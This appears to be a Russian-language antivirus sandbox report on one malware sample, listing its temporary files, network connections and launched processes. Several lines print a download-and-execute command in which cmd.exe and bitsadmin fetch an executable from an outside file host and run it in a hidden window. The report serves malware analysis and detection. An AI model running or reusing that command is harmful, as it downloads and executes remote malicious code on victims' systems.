Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer a /download /priority high https://a.pomf.cat/pudfbr.exe %tmp%\fin.exe & %tmp%\fin.exe & exit
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\cabf5c.tmp
- %WINDIR%\temp\tar4fd6.tmp
- %WINDIR%\temp\cab4fd5.tmp
- %WINDIR%\temp\tar4fa6.tmp
- %WINDIR%\temp\cab4fa5.tmp
- %WINDIR%\temp\tar3aad.tmp
- %WINDIR%\temp\cab3aac.tmp
- %WINDIR%\temp\tar3a7c.tmp
- %WINDIR%\temp\cab3a7b.tmp
- %WINDIR%\temp\tar2584.tmp
- %WINDIR%\temp\cab2583.tmp
- %WINDIR%\temp\tar2572.tmp
- %WINDIR%\temp\cab2571.tmp
- %WINDIR%\temp\tar2551.tmp
- %WINDIR%\temp\cab2550.tmp
- %WINDIR%\temp\tar2520.tmp
- %WINDIR%\temp\cab251f.tmp
- %WINDIR%\temp\tarf5d.tmp
- %WINDIR%\temp\cab64be.tmp
- %WINDIR%\temp\tar64bf.tmp
Удаляет следующие файлы
- %WINDIR%\temp\cabf5c.tmp
- %WINDIR%\temp\tar4fd6.tmp
- %WINDIR%\temp\cab4fd5.tmp
- %WINDIR%\temp\tar4fa6.tmp
- %WINDIR%\temp\cab4fa5.tmp
- %WINDIR%\temp\tar3aad.tmp
- %WINDIR%\temp\cab3aac.tmp
- %WINDIR%\temp\tar3a7c.tmp
- %WINDIR%\temp\cab3a7b.tmp
- %WINDIR%\temp\tar2584.tmp
- %WINDIR%\temp\cab2583.tmp
- %WINDIR%\temp\tar2572.tmp
- %WINDIR%\temp\cab2571.tmp
- %WINDIR%\temp\tar2551.tmp
- %WINDIR%\temp\cab2550.tmp
- %WINDIR%\temp\tar2520.tmp
- %WINDIR%\temp\cab251f.tmp
- %WINDIR%\temp\tarf5d.tmp
- %WINDIR%\temp\cab64be.tmp
- %WINDIR%\temp\tar64bf.tmp
Сетевая активность
Подключается к
- 'a.##mf.cat':443
TCP
Другие
- 'a.##mf.cat':443
UDP
- DNS ASK a.##mf.cat
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer a /download /priority high https://a.pomf.cat/pudfbr.exe %tmp%\fin.exe & %tmp%\fin.exe & exit' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\bitsadmin.exe' /transfer a /download /priority high https://a.pomf.cat/pudfbr.exe %TEMP%\fin.exe
